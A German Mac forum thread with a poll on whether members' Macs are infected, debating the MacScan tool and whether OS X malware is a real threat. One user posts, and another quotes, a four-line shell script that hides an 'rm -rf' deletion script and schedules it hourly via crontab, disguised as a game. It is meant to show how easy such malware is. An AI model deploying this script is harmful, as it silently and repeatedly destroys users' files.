Trojaner, Spyware und Keylogger - ist dein Mac OS X verseucht?

Ist dein Mac bereits verseucht?

  • Nein, MacScan hat keinen Trojaner, Spyware oder Keylogger gefunden.

    Stimmen: 74 55,2%

  • Ja und zwar mit folgender Schadsoftware ---> bitte informiere uns!

    Stimmen: 3 2,2%

  • Ich werde mein System nicht testen. (Warum? Schreib deine Meinung...)

    Stimmen: 57 42,5%
  • Umfrageteilnehmer
    134
cilly schrieb:
Überhaupt kein Problem, doch dass es Bedarf für solche Software gibt, hat das kleine Trojaner.app von maceis gezeigt!
Zum Vergrößern anklicken....
Hat denn MacScan den Trojaner gefunden?
 
maceis schrieb:
Es ging mir lediglich darum, die "Ich hab nen Mac; mir kann eh nichts passieren"-Denkweise zu widerlegen.
Zum Vergrößern anklicken....

Ja, schon klar, war auch eher ironisch gemeint so nach dem Motto "Während die Windows Gemeinde sich einen Kopf macht wie sie all das neue Zeugs möglichst schnell wieder loswerden/respektive nicht erst bekommen muss die Mac Gemeinde erstmal was "zusammenbasteln" um zu zeigen das es auch für uns sowas gibt/geben kann."
 
@maceis

Nein, aber es handelt sich auch nicht um einen Trojaner, denn das Proggy muss vom User gestartet werden.
 
cilly schrieb:
...Wenn dann keine Trojaner gefunden würden... hätten wir keine Probleme.
Zum Vergrößern anklicken....
Wirklich?
Irgendein Programm, von dem keiner von uns so richtig weiß, was es eigentlich tut, findet nichts. Und damit kann man dann tatsächlich zufrieden sein??
Da lobe ich mir z.B. spybot für Windows, der auch sagt, was er so alles kann und tut.
 
ich fühle mich sicher. da ich mich auf die software, die ich aus legalen quellen bezogen habe verlassen kann und artig sicherheitspatches einspiele und nicht alles installiere, was mir offeriert wird, geschweige denn, irgendwo alles anklicke was bunt blinkt. das funktioniert so auf die weise selbst bei windows zuverläsig, dass ich mit der methode dort auch keine probleme habe. wieso soltle ich dann auf der minderheitenplattform OS X schwierigkeiten haben?


daher: ich werd das ding nicht herunterladen und fühle mich sicher wie man sich nur fühlen kann!
 
Nur weil mein Computer aussieht wie aus der Arztpraxis kann er sich ja trotzdem was einfangen. Gerade die Sorglosigkeit des Anwenders ist ja ein Einfallstor für Viren. Muß ich jetzt nochal loswerden.

Natürlich ist der Aufmacher dieses Threads (ein allwissendes Computerprogramm) dazu geeignet die Diskussion in die nächste Sackgasse zu führen, ich finde die Diskussion aber gut und finde es schon wichtig Sicherheitsaspekte als prinzipiell wichtig einzustufen.

Sich dann ein tatsächlich bombensicheres System zusammenzustellen ist natürlich etwas komplizierter und ich bin da auch bestimmt noch weit von entfernt.
 
Mal eine frage an die Tester:
Habt ihr es im authenticated mode laufen lassen?
Hans
 
hab es nicht getestet weil ich dem Programm nicht vertraue sehr dubios.
Basta
 
Ich hab's ohne authenticated mode laufen lassen.

Übrigens, diejenigen die dem Tool misstrauen können einen neuen Benutzer ohne Adminrechte anlegen, dann das Programm von diesem Benutzer aus ohne Adminrechte und ohne Authentisierung starten. Anschließend den neuen Benutzer wieder löschen.
 
Chicago Whistle schrieb:
Nur weil mein Computer aussieht wie aus der Arztpraxis kann er sich ja trotzdem was einfangen. Gerade die Sorglosigkeit des Anwenders ist ja ein Einfallstor für Viren. Muß ich jetzt nochal loswerden.
Zum Vergrößern anklicken....

Das ist richtig. Aber eine solche Software ersetzt keinesfalls den "gesunden Userverstand" beim Umgang mit dubiosen Softwarequellen, Internetseiten oder das Einspielen von Patches. Wer sich an diese grundlegenden Regeln hält braucht eine solche Software nicht.
 
cilly schrieb:
@maceis

Nein, aber es handelt sich auch nicht um einen Trojaner, denn das Proggy muss vom User gestartet werden.
Zum Vergrößern anklicken....

Die meisten Windows Trojaner werden vom User gestartet.
Ich erinner gerne mal auch z.B. an den ILoveU der von Millonen Usern freiwillig gestartet wurde! Und heute kommen immernoch EMail Würmer die von Usern selbst gestartet werden.
 
avalon schrieb:
Siehst du, die Fragen hättest du dir ohne diesen Fred gar nicht gestellt, weil eben unnötig.

Wenn es was geben sollte, wird es früh genug publik gemacht, und dann kann man sich immer noch damit auseinandersetzen..

Ich nehme auch nicht dauernd Hustensaft um einer möglichen Erkältung vorzubeugen.

Ich halte es auch für ein klein wenig Panikmache, mit dem Ziel Software zu verkaufen, wie bei Norton und Co. auch.

Auch wenn das Tool jetzt noch frei zu haben ist..
Zum Vergrößern anklicken....
Ich finde nicht, dass solche Fragen unnötig sind - Fragen nach Sicherheit sind niemals unnötig. Wir MacUser sollten uns nicht das eigene Grab schaufeln, indem wir krampfhaft so tun wollen, als gäbe es keine Schädlinge für unsere Lieblinge ;).

Das bringt mich gleich zum nächsten Punkt: Wer der "Meinung" ist, dass Schädlinge für OS X besonders schwierig zu programmieren sind o.ä. irrt gewaltig. Ich - und jeder, der nur ein paar elementare Dinge über Unix weiss - könnte in ein paar Sekunden ein Shell-Script zusammenbasteln, das grossen Schaden anrichtet, selbst wenn der User nicht als Admin arbeitet - die persönlichen Daten sind meist eh wichtiger und da bildet das Home-Verzeichnis einen idealen Angriffspunkt, wie ja oben schon demonstriert wurde.

Daher hier ein ganz simples Beispiel eines solchen Scripts, das ich schnell zusammengebastelt habe:

Code: 
declare pfad=$HOME/testordner
echo "rm -rf $pfad" > .trojaner
echo '0 * * * * '$PWD'/.trojaner' > .cronjob
crontab .cronjob

Dieser Vierzeiler (man beachte wie wenig Code da vorhanden ist ;)) wird dem User z.B. als "Lustiges_Spiel.command" geliefert und wenn er sie per Doppelklick ausführt, passiert folgendes: Es wird ein neues unsichtbares Script (=Schädling) angelegt, welches ein bestimmtes Verzeichnis löscht. Dann wird von meinem kleinen "Trojaner" ein neuer (ebenfalls unsichtbaren) Cronjob definiert, welcher fortan zu jeder vollen Stunde den Schädling ausführt. Genauso gut könnte man damit nicht den harmlosen "testordner" löschen, sondern das gesamte Home-Verzeichnis - und das alles ohne Admin- oder gar root-Rechte.

Und da wird behauptet, OS X wäre sicher :rolleyes:.
 
@sheep

Danke, ich kam mir schon wie eine paranoide Außenseiterin vor...
 
cilly schrieb:
@sheep

Danke, ich kam mir schon wie eine paranoide Außenseiterin vor...
Zum Vergrößern anklicken....
nö nö.
Es lesen halt auch manche mit, die allerdings keine fundierten Kenntnisse haben und sich deshalb nicht äussern... :eek:
 
cilly schrieb:
@sheep

Danke, ich kam mir schon wie eine paranoide Außenseiterin vor...
Zum Vergrößern anklicken....
Lieber paranoid als blauäugig :p.

Ich hoffe übrigens nicht, dass mein Script hier Anstoss erregt, es soll nur demonstrieren, wie - geradezu unglaublich - einfach es ist, einen Schädling für Unix / OS X zu schreiben.
 
sheep schrieb:
Code: 
declare pfad=$HOME/testordner
echo "rm -rf $pfad" > .trojaner
echo '0 * * * * '$PWD'/.trojaner' > .cronjob
crontab .cronjob



Und da wird behauptet, OS X wäre sicher :rolleyes:.
Zum Vergrößern anklicken....

Ist ja alles gut und schön, aber warum gibt es keine da draußen.
Die Frage hat mir immer noch keiner beantwortet.

Wenn es so leicht wäre, dann wären sie im Umlauf, dafür möchte ich meinen Allerwertesten verwetten.
 
Aöso ich habe das programm geladen, installiert und mein System getestet.
NICHTS:

Auf der betreffenden Seite habe ich falsche Angaben gemacht und das Programm habe ich in meinen Proggiefolder gelegt.
Ich sehe hier kein Problem.

Panikmache, wie bereits gesagt.

dasich
 
Ist dein Mac bereits verseucht?

Wenn mein Router nicht dazwischen wäre: JA!
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Zurück
Oben Unten